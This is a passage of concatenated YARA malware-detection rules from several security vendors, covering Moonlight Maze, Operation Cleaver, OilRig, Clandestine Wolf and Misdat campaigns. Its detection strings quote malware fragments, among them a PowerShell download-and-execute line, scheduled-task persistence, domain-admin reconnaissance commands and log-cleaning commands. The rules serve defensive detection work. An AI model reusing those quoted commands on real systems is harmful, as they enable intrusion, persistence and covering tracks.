wide $a2="May be %s is empty?" ascii wide $a3="template string = |%s|" ascii wide $a4="No blocks !!!" $a5="No data in this block !!!!!!" ascii wide $a6="No good line" condition: ((3 of ($a*))) } rule apt_RU_MoonlightMaze_xk_keylogger { meta: author = "Kaspersky Lab" date = "2017-03-27" version = "1.0" last_modified = "2017-03-27" reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" description = "Rule to detect Moonlight Maze 'xk' keylogger" strings: $a1="Log ended at => %s" $a2="Log started at => %s [pid %d]" $a3="/var/tmp/task" fullword $a4="/var/tmp/taskhost" fullword $a5="my hostname: %s" $a6="/var/tmp/tasklog" $a7="/var/tmp/.Xtmp01" fullword $a8="myfilename=-%s-" $a9="/var/tmp/taskpid" $a10="mypid=-%d-" fullword $a11="/var/tmp/taskgid" fullword $a12="mygid=-%d-" fullword condition: ((3 of ($a*))) } rule apt_RU_MoonlightMaze_encrypted_keylog { meta: author = "Kaspersky Lab" date = "2017-03-27" version = "1.0" last_modified = "2017-03-27" reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" description = "Rule to detect Moonlight Maze encrypted keylogger logs" strings: $a1={47 01 22 2A 6D 3E 39 2C} condition: ($a1 at 0) } rule apt_RU_MoonlightMaze_IRIX_exploit_GEN { meta: author = "Kaspersky Lab" date = "2017-03-27" version = "1.0" last_modified = "2017-03-27" reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" description = "Rule to detect Irix exploits from David Hedley used by Moonlight Maze hackers" reference2 = "https://www.exploit-db.com/exploits/19274/" hash = "008ea82f31f585622353bd47fa1d84be" //df3 hash = "a26bad2b79075f454c83203fa00ed50c" //log hash = "f67fc6e90f05ba13f207c7fdaa8c2cab" //xconsole hash = "5937db3896cdd8b0beb3df44e509e136" //xlock hash = "f4ed5170dcea7e5ba62537d84392b280" //xterm strings: $a1="stack = 0x%x, targ_addr = 0x%x" $a2="execl failed" condition: (uint32(0)==0x464c457f) and (all of them) } rule apt_RU_MoonlightMaze_u_logcleaner { meta: author = "Kaspersky Lab" date = "2017-03-27" version = "1.0" last_modified = "2017-03-27" reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" description = "Rule to detect log cleaners based on utclean.c" reference2 = "http://cd.textfiles.com/cuteskunk/Unix-Hacking-Exploits/utclean.c" hash = "d98796dcda1443a37b124dbdc041fe3b" hash = "73a518f0a73ab77033121d4191172820" strings: $a1="Hiding complit...n" $a2="usage: %s <username> <fixthings> [hostname]" $a3="ls -la %s* ; /bin/cp ./wtmp.tmp %s; rm ./wtmp.tmp" condition: (uint32(0)==0x464c457f) and (any of them) } rule apt_RU_MoonlightMaze_wipe { meta: author = "Kaspersky Lab" date = "2017-03-27" version = "1.0" last_modified = "2017-03-27" reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" description = "Rule to detect log cleaner based on wipe.c" reference2 = "http://www.afn.org/~afn28925/wipe.c" hash = "e69efc504934551c6a77b525d5343241" strings: $a1="ERROR: Unlinking tmp WTMP file." $a2="USAGE: wipe [ u|w|l|a ] ...options..." $a3="Erase acct entries on tty : wipe a [username] [tty]" $a4="Alter lastlog entry : wipe l [username] [tty] [time] [host]" condition: (uint32(0)==0x464c457f) and (2 of them) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule APT_NGO_wuaclt { meta: author = "AlienVault Labs" strings: $a = "%%APPDATA%%\\Microsoft\\wuauclt\\wuauclt.dat" $b = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" $c = "/news/show.asp?id%d=%d" $d = "%%APPDATA%%\\Microsoft\\wuauclt\\" $e = "0l23kj@nboxu" $f = "%%s.asp?id=%%d&Sid=%%d" $g = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SP Q%%d)" $h = "Cookies: UseID=KGIOODAOOK%%s" condition: ($a and $b and $c) or ($d and $e) or ($f and $g and $h) } rule APT_NGO_wuaclt_PDF { meta: author = "AlienVault Labs" strings: $pdf = "%PDF" nocase $comment = {3C 21 2D 2D 0D 0A 63 57 4B 51 6D 5A 6C 61 56 56 56 56 56 56 56 56 56 56 56 56 56 63 77 53 64 63 6A 4B 7A 38 35 6D 37 4A 56 6D 37 4A 46 78 6B 5A 6D 5A 6D 52 44 63 5A 58 41 73 6D 5A 6D 5A 7A 42 4A 31 79 73 2F 4F 0D 0A} condition: $pdf at 0 and $comment in (0..200) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule ZhoupinExploitCrew { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "zhoupin exploit crew" nocase $s2 = "zhopin exploit crew" nocase condition: 1 of them } rule BackDoorLogger { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "BackDoorLogger" $s2 = "zhuAddress" condition: all of them } rule Jasus { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "pcap_dump_open" $s2 = "Resolving IPs to poison..." $s3 = "WARNNING: Gateway IP can not be found" condition: all of them } rule LoggerModule { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "%s-%02d%02d%02d%02d%02d.r" $s2 = "C:\\Users\\%s\\AppData\\Cookies\\" condition: all of them } rule NetC { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "NetC.exe" wide $s2 = "Net Service" condition: all of them } rule ShellCreator2 { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "ShellCreator2.Properties" $s2 = "set_IV" condition: all of them } rule SmartCopy2 { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "SmartCopy2.Properties" $s2 = "ZhuFrameWork" condition: all of them } rule SynFlooder { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "Unable to resolve [ %s ]. ErrorCode %d" $s2 = "your target's IP is : %s" $s3 = "Raw TCP Socket Created successfully." condition: all of them } rule TinyZBot { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "NetScp" wide $s2 = "TinyZBot.Properties.Resources.resources" $s3 = "Aoao WaterMark" $s4 = "Run_a_exe" $s5 = "netscp.exe" $s6 = "get_MainModule_WebReference_DefaultWS" $s7 = "remove_CheckFileMD5Completed" $s8 = "http://tempuri.org/" $s9 = "Zhoupin_Cleaver" condition: ($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or ($s9) } rule antivirusdetector { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "getShadyProcess" $s2 = "getSystemAntiviruses" $s3 = "AntiVirusDetector" condition: all of them } rule csext { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "COM+ System Extentions" $s2 = "csext.exe" $s3 = "COM_Extentions_bin" condition: all of them } rule kagent { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "kill command is in last machine, going back" $s2 = "message data length in B64: %d Bytes" condition: all of them } rule mimikatzWrapper : Toolkit { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "mimikatzWrapper" $s2 = "get_mimikatz" condition: all of them } rule pvz_in { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "LAST_TIME=00/00/0000:00:00PM$" $s2 = "if %%ERRORLEVEL%% == 1 GOTO line" condition: all of them } rule pvz_out { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "Network Connectivity Module" wide $s2 = "OSPPSVC" wide condition: all of them } rule wndTest { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "[Alt]" wide $s2 = "<< %s >>:" wide $s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;" condition: all of them } rule zhCat { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "zhCat -l -h -tp 1234" $s2 = "ABC ( A Big Company )" wide condition: all of them } rule zhLookUp { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "zhLookUp.Properties" condition: all of them } rule zhmimikatz { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "MimikatzRunner" $s2 = "zhmimikatz" condition: all of them } rule Zh0uSh311 { meta: author = "Cylance" date = "2014-12-02" description = "http://cylance.com/opcleaver" strings: $s1 = "Zh0uSh311" condition: all of them } rule OPCLEAVER_BackDoorLogger { meta: description = "Keylogger used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "BackDoorLogger" $s2 = "zhuAddress" condition: all of them } rule OPCLEAVER_Jasus { meta: description = "ARP cache poisoner used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "pcap_dump_open" $s2 = "Resolving IPs to poison..." $s3 = "WARNNING: Gateway IP can not be found" condition: all of them } rule OPCLEAVER_LoggerModule { meta: description = "Keylogger used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "%s-%02d%02d%02d%02d%02d.r" $s2 = "C:\\Users\\%s\\AppData\\Cookies\\" condition: all of them } rule OPCLEAVER_NetC { meta: description = "Net Crawler used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "NetC.exe" wide $s2 = "Net Service" condition: all of them } rule OPCLEAVER_ShellCreator2 { meta: description = "Shell Creator used by attackers in Operation Cleaver to create ASPX web shells" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "ShellCreator2.Properties" $s2 = "set_IV" condition: all of them } rule OPCLEAVER_SmartCopy2 { meta: description = "Malware or hack tool used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "SmartCopy2.Properties" $s2 = "ZhuFrameWork" condition: all of them } rule OPCLEAVER_SynFlooder { meta: description = "Malware or hack tool used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "Unable to resolve [ %s ]. ErrorCode %d" $s2 = "your target’s IP is : %s" $s3 = "Raw TCP Socket Created successfully." condition: all of them } rule OPCLEAVER_TinyZBot { meta: description = "Tiny Bot used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "NetScp" wide $s2 = "TinyZBot.Properties.Resources.resources" $s3 = "Aoao WaterMark" $s4 = "Run_a_exe" $s5 = "netscp.exe" $s6 = "get_MainModule_WebReference_DefaultWS" $s7 = "remove_CheckFileMD5Completed" $s8 = "http://tempuri.org/" $s9 = "Zhoupin_Cleaver" condition: (($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or $s9) } rule OPCLEAVER_ZhoupinExploitCrew { meta: description = "Keywords used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "zhoupin exploit crew" nocase $s2 = "zhopin exploit crew" nocase condition: 1 of them } rule OPCLEAVER_antivirusdetector { meta: description = "Hack tool used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "getShadyProcess" $s2 = "getSystemAntiviruses" $s3 = "AntiVirusDetector" condition: all of them } rule OPCLEAVER_csext { meta: description = "Backdoor used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "COM+ System Extentions" $s2 = "csext.exe" $s3 = "COM_Extentions_bin" condition: all of them } rule OPCLEAVER_kagent { meta: description = "Backdoor used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "kill command is in last machine, going back" $s2 = "message data length in B64: %d Bytes" condition: all of them } rule OPCLEAVER_mimikatzWrapper { meta: description = "Mimikatz Wrapper used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "mimikatzWrapper" $s2 = "get_mimikatz" condition: all of them } rule OPCLEAVER_pvz_in { meta: description = "Parviz tool used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "LAST_TIME=00/00/0000:00:00PM$" $s2 = "if %%ERRORLEVEL%% == 1 GOTO line" condition: all of them } rule OPCLEAVER_pvz_out { meta: description = "Parviz tool used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "Network Connectivity Module" wide $s2 = "OSPPSVC" wide condition: all of them } rule OPCLEAVER_wndTest { meta: description = "Backdoor used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "[Alt]" wide $s2 = "<< %s >>:" wide $s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;" condition: all of them } rule OPCLEAVER_zhCat { meta: description = "Network tool used by Iranian hackers and used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "Mozilla/4.0 ( compatible; MSIE 7.0; AOL 8.0 )" ascii fullword $s2 = "ABC ( A Big Company )" wide fullword condition: all of them } rule OPCLEAVER_zhLookUp { meta: description = "Hack tool used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "zhLookUp.Properties" condition: all of them } rule OPCLEAVER_zhmimikatz { meta: description = "Mimikatz wrapper used by attackers in Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Cylance Inc." score = "70" strings: $s1 = "MimikatzRunner" $s2 = "zhmimikatz" condition: all of them } rule OPCLEAVER_Parviz_Developer { meta: description = "Parviz developer known from Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Florian Roth" score = "70" strings: $s1 = "Users\\parviz\\documents\\" nocase condition: $s1 } rule OPCLEAVER_CCProxy_Config { meta: description = "CCProxy config known from Operation Cleaver" reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf" date = "2014/12/02" author = "Florian Roth" score = "70" strings: $s1 = "UserName=User-001" fullword ascii $s2 = "Web=1" fullword ascii $s3 = "Mail=1" fullword ascii $s4 = "FTP=0" fullword ascii $x1 = "IPAddressLow=78.109.194.114" fullword ascii condition: all of ($s*) or $x1 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Rule Set ----------------------------------------------------------------- */ rule OilRig_Malware_Campaign_Gen1 { meta: description = "Detects malware from OilRig Campaign" author = "Florian Roth" reference = "https://goo.gl/QMRZ8K" date = "2016-10-12" hash1 = "d808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34" hash2 = "80161dad1603b9a7c4a92a07b5c8bce214cf7a3df897b561732f9df7920ecb3e" hash3 = "662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f" hash4 = "903b6d948c16dc92b69fe1de76cf64ab8377893770bf47c29bf91f3fd987f996" hash5 = "c4fbc723981fc94884f0f493cb8711fdc9da698980081d9b7c139fcffbe723da" hash6 = "57efb7596e6d9fd019b4dc4587ba33a40ab0ca09e14281d85716a253c5612ef4" hash7 = "1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1" hash8 = "9f31a1908afb23a1029c079ee9ba8bdf0f4c815addbe8eac85b4163e02b5e777" hash9 = "0cd9857a3f626f8e0c07495a4799c59d502c4f3970642a76882e3ed68b790f8e" hash10 = "4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281" hash11 = "4e5b85ea68bf8f2306b6b931810ae38c8dff3679d78da1af2c91032c36380353" hash12 = "c3c17383f43184a29f49f166a92453a34be18e51935ddbf09576a60441440e51" hash13 = "f3856c7af3c9f84101f41a82e36fc81dfc18a8e9b424a3658b6ba7e3c99f54f2" hash14 = "0c64ab9b0c122b1903e8063e3c2c357cbbee99de07dc535e6c830a0472a71f39" hash15 = "d874f513a032ccb6a5e4f0cd55862b024ea0bee4de94ccf950b3dd894066065d" hash16 = "8ee628d46b8af20c4ba70a2fe8e2d4edca1980583171b71fe72455c6a52d15a9" hash17 = "55d0e12439b20dadb5868766a5200cbbe1a06053bf9e229cf6a852bfcf57d579" hash18 = "528d432952ef879496542bc62a5a4b6eee788f60f220426bd7f933fa2c58dc6b" hash19 = "93940b5e764f2f4a2d893bebef4bf1f7d63c4db856877020a5852a6647cb04a0" hash20 = "e2ec7fa60e654f5861e09bbe59d14d0973bd5727b83a2a03f1cecf1466dd87aa" hash21 = "9c0a33a5dc62933f17506f20e0258f877947bdcd15b091a597eac05d299b7471" hash22 = "a787c0e42608f9a69f718f6dca5556607be45ec77d17b07eb9ea1e0f7bb2e064" hash23 = "3772d473a2fe950959e1fd56c9a44ec48928f92522246f75f4b8cb134f4713ff" hash24 = "3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4" hash25 = "f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e" strings: $x1 = "Get-Content $env:Public\\Libraries\\update.vbs) -replace" ascii $x2 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {waitfor haha /T 2}\" & Chr(34), 0" fullword ascii $x3 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" fullword ascii $s4 = "CreateObject(\"WScript.Shell\").Run cmd, 0o" fullword ascii /* Base64 encode config */ /* $global:myhost = */ $b1 = "JGdsb2JhbDpteWhvc3QgP" ascii /* HOME="%public%\Libraries\" */ $b2 = "SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzX" ascii /* Set wss = CreateObject("wScript.Shell") */ $b3 = "U2V0IHdzcyA9IENyZWF0ZU9iamVjdCgid1NjcmlwdC5TaGV" ascii /* $scriptdir = Split-Path -Parent -Path $ */ $b4 = "JHNjcmlwdGRpciA9IFNwbGl0LVBhdGggLVBhcmVudCAtUGF0aCA" ascii /* \x0aSet wss = CreateObject("wScript.Shell") */ $b5 = "DQpTZXQgd3NzID0gQ3JlYXRlT2JqZWN" ascii /* whoami & hostname */ $b6 = "d2hvYW1pICYgaG9zdG5hb" ascii condition: ( uint16(0) == 0xcfd0 and filesize < 700KB and 1 of them ) } rule OilRig_Malware_Campaign_Mal1 { meta: description = "Detects malware from OilRig Campaign" author = "Florian Roth" reference = "https://goo.gl/QMRZ8K" date = "2016-10-12" hash1 = "e17e1978563dc10b73fd54e7727cbbe95cc0b170a4e7bd0ab223e059f6c25fcc" strings: $x1 = "DownloadExecute=\"powershell \"\"&{$r=Get-Random;$wc=(new-object System.Net.WebClient);$wc.DownloadFile(" ascii $x2 = "-ExecutionPolicy Bypass -File \"&HOME&\"dns.ps1\"" fullword ascii $x3 = "CreateObject(\"WScript.Shell\").Run Replace(DownloadExecute,\"-_\",\"bat\")" fullword ascii $x4 = "CreateObject(\"WScript.Shell\").Run DnsCmd,0" fullword ascii $s1 = "http://winodwsupdates.me" ascii condition: ( uint16(0) == 0x4f48 and filesize < 4KB and 1 of them ) or ( 2 of them ) } rule OilRig_Malware_Campaign_Gen2 { meta: description = "Detects malware from OilRig Campaign" author = "Florian Roth" reference = "https://goo.gl/QMRZ8K" date = "2016-10-12" hash1 = "c6437f57a8f290b5ec46b0933bfa8a328b0cb2c0c7fbeea7f21b770ce0250d3d" hash2 = "293522e83aeebf185e653ac279bba202024cedb07abc94683930b74df51ce5cb" strings: $s1 = "%userprofile%\\AppData\\Local\\Microsoft\\ " fullword ascii $s2 = "$fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('" fullword ascii $s3 = "&{$rn = Get-Random; $id = 'TR" fullword ascii $s4 = "') -replace '__',('DNS'+$id) | " fullword ascii $s5 = "\\upd.vbs" fullword ascii $s6 = "schtasks /create /F /sc minute /mo " fullword ascii $s7 = "') -replace '__',('HTP'+$id) | " fullword ascii $s8 = "&{$rn = Get-Random -minimum 1 -maximum 10000; $id = 'AZ" fullword ascii $s9 = "http://www.israirairlines.com/?mode=page&page=14635&lang=eng<" fullword ascii condition: ( uint16(0) == 0xcfd0 and filesize < 4000KB and 2 of ($s*) ) or ( 4 of them ) } rule OilRig_Malware_Campaign_Gen3 { meta: description = "Detects malware from OilRig Campaign" author = "Florian Roth" reference = "https://goo.gl/QMRZ8K" date = "2016-10-12" hash1 = "5e9ddb25bde3719c392d08c13a295db418d7accd25d82d020b425052e7ba6dc9" hash2 = "bd0920c8836541f58e0778b4b64527e5a5f2084405f73ee33110f7bc189da7a9" hash3 = "90639c7423a329e304087428a01662cc06e2e9153299e37b1b1c90f6d0a195ed" strings: $x1 = "source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr" fullword ascii $x2 = "\\Libraries\\fireueye.vbs" fullword ascii $x3 = "\\Libraries\\fireeye.vbs&" fullword wide condition: ( uint16(0) == 0xcfd0 and filesize < 100KB and 1 of them ) } rule OilRig_Malware_Campaign_Mal2 { meta: description = "Detects malware from OilRig Campaign" author = "Florian Roth" reference = "https://goo.gl/QMRZ8K" date = "2016-10-12" hash1 = "65920eaea00764a245acb58a3565941477b78a7bcc9efaec5bf811573084b6cf" strings: $x1 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {(Get-Content $env:Public\\Libraries\\update.vbs) -replace '__',(Get-Random) | Set-C" ascii $x2 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" fullword ascii $x3 = "mailto:Mohammed.sarah@gratner.com" fullword wide $x4 = "mailto:Tarik.Imam@gartner.com" fullword wide $x5 = "Call Extract(DnsPs1, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\dns.ps1\")" fullword ascii $x6 = "2dy53My5vcmcvMjAw" fullword wide /* base64 encoded string 'w.w3.org/200' */ condition: ( uint16(0) == 0xcfd0 and filesize < 200KB and 1 of them ) } rule OilRig_Campaign_Reconnaissance { meta: description = "Detects Windows discovery commands - known from OilRig Campaign" author = "Florian Roth" reference = "https://goo.gl/QMRZ8K" date = "2016-10-12" hash1 = "5893eae26df8e15c1e0fa763bf88a1ae79484cdb488ba2fc382700ff2cfab80c" strings: $s1 = "whoami & hostname & ipconfig /all" ascii $s2 = "net user /domain 2>&1 & net group /domain 2>&1" ascii $s3 = "net group \"domain admins\" /domain 2>&1 & " ascii condition: ( filesize < 1KB and 1 of them ) } rule OilRig_Malware_Campaign_Mal3 { meta: description = "Detects malware from OilRig Campaign" author = "Florian Roth" reference = "https://goo.gl/QMRZ8K" date = "2016-10-12" hash1 = "02226181f27dbf59af5377e39cf583db15200100eea712fcb6f55c0a2245a378" strings: $x1 = "(Get-Content $env:Public\\Libraries\\dns.ps1) -replace ('#'+'##'),$botid | Set-Content $env:Public\\Libraries\\dns.ps1" fullword ascii $x2 = "Invoke-Expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')" fullword ascii $x3 = "('00000000'+(convertTo-Base36(Get-Random -Maximum 46655)))" fullword ascii condition: ( filesize < 10KB and 1 of them ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule OpClandestineWolf { meta: alert_severity = "HIGH" log = "false" author = "NDF" weight = 10 alert = true source = " https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html" version = 1 date = "2015-06-23" description = "Operation Clandestine Wolf signature based on OSINT from 06.23.15" hash0 = "1a4b710621ef2e69b1f7790ae9b7a288" hash1 = "917c92e8662faf96fffb8ffe7b7c80fb" hash2 = "975b458cb80395fa32c9dda759cb3f7b" hash3 = "3ed34de8609cd274e49bbd795f21acc4" hash4 = "b1a55ec420dd6d24ff9e762c7b753868" hash5 = "afd753a42036000ad476dcd81b56b754" hash6 = "fad20abf8aa4eda0802504d806280dd7" hash7 = "ab621059de2d1c92c3e7514e4b51751a" hash8 = "510b77a4b075f09202209f989582dbea" hash9 = "d1b1abfcc2d547e1ea1a4bb82294b9a3" hash10 = "4692337bf7584f6bda464b9a76d268c1" hash11 = "7cae5757f3ba9fef0a22ca0d56188439" hash12 = "1a7ba923c6aa39cc9cb289a17599fce0" hash13 = "f86db1905b3f4447eb5728859f9057b5" hash14 = "37c6d1d3054e554e13d40ea42458ebed" hash15 = "3e7430a09a44c0d1000f76c3adc6f4fa" hash16 = "98eb249e4ddc4897b8be6fe838051af7" hash17 = "1b57a7fad852b1d686c72e96f7837b44" hash18 = "ffb84b8561e49a8db60e0001f630831f" hash19 = "98eb249e4ddc4897b8be6fe838051af7" hash20 = "dfb4025352a80c2d81b84b37ef00bcd0" hash21 = "4457e89f4aec692d8507378694e0a3ba" hash22 = "48de562acb62b469480b8e29821f33b8" hash23 = "7a7eed9f2d1807f55a9308e21d81cccd" hash24 = "6817b29e9832d8fd85dcbe4af176efb6" strings: $s0 = "flash.Media.Sound()" $s1 = "call Kernel32!VirtualAlloc(0x1f140000hash$=0x10000hash$=0x1000hash$=0x40)" $s2 = "{4D36E972-E325-11CE-BFC1-08002BE10318}" $s3 = "NetStream" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Misdat_Backdoor_Packed { meta: author = "Cylance SPEAR Team" note = "Probably Prone to False Positive" strings: $upx = {33 2E 30 33 00 55 50 58 21} $send = {00 00 00 73 65 6E 64 00 00 00} $delphi_sec_pe = {50 45 00 00 4C 01 03 00 19 5E 42 2A} $shellexec = {00 00 00 53 68 65 6C 6C 45 78 65 63 75 74 65 57 00 00 00} condition: filesize < 100KB and $upx and $send and $delphi_sec_pe and $shellexec } rule MiSType_Backdoor_Packed { meta: author = "Cylance SPEAR Team" note = "Probably Prone to False Positive" strings: $upx = {33 2E 30 33 00 55 50 58 21} $send_httpquery = {00 00 00 48 74 74 70 51 75 65 72 79 49 6E 66 6F 41 00 00 73 65 6E 64 00 00} $delphi_sec_pe = {50 45 00 00 4C 01 03 00 19 5E 42 2A} condition: filesize < 100KB and $upx and $send_httpquery and $delphi_sec_pe } rule Misdat_Backdoor { meta: author = "Cylance SPEAR Team" /* Decode Function CODE:00406C71 8B 55 F4 mov edx, [ebp+var_C] CODE:00406C74 8A 54 1A FF mov dl, [edx+ebx-1] CODE:00406C78 8B 4D F8 mov ecx, [ebp+var_8] CODE:00406C7B C1 E9 08 shr ecx, 8 CODE:00406C7E 32 D1 xor dl, cl CODE:00406C80 88 54 18 FF mov [eax+ebx-1], dl CODE:00406C84 8B 45 F4 mov eax, [ebp+var_C] CODE:00406C87 0F B6 44 18 FF movzx eax, byte ptr [eax+ebx-1] CODE:00406C8C 03 45 F8 add eax, [ebp+var_8] CODE:00406C8F 69 C0 D9 DB 00 00 imul eax, 0DBD9h CODE:00406C95 05 3B DA 00 00 add eax, 0DA3Bh CODE:00406C9A 89 45 F8 mov [ebp+var_8], eax CODE:00406C9D 43 inc ebx CODE:00406C9E 4E dec esi CODE:00406C9F 75 C9 jnz short loc_406C6A */ strings: $imul = {03 45 F8 69 C0 D9 DB 00 00 05 3B DA 00 00} $delphi = {50 45 00 00 4C 01 08 00 19 5E 42 2A} condition: $imul and $delphi } rule SType_Backdoor { meta: author = "Cylance SPEAR Team" /* Decode Function 8B 1A mov ebx, [edx] 8A 1B mov bl, [ebx] 80 EB 02 sub bl, 2 8B 74 24 08 mov esi, [esp+14h+var_C] 32 1E xor bl, [esi] 8B 31 mov esi, [ecx] 88 1E mov [esi], bl 8B 1A mov ebx, [edx] 43 inc ebx 89 1A mov [edx], ebx 8B 19 mov ebx, [ecx] 43 inc 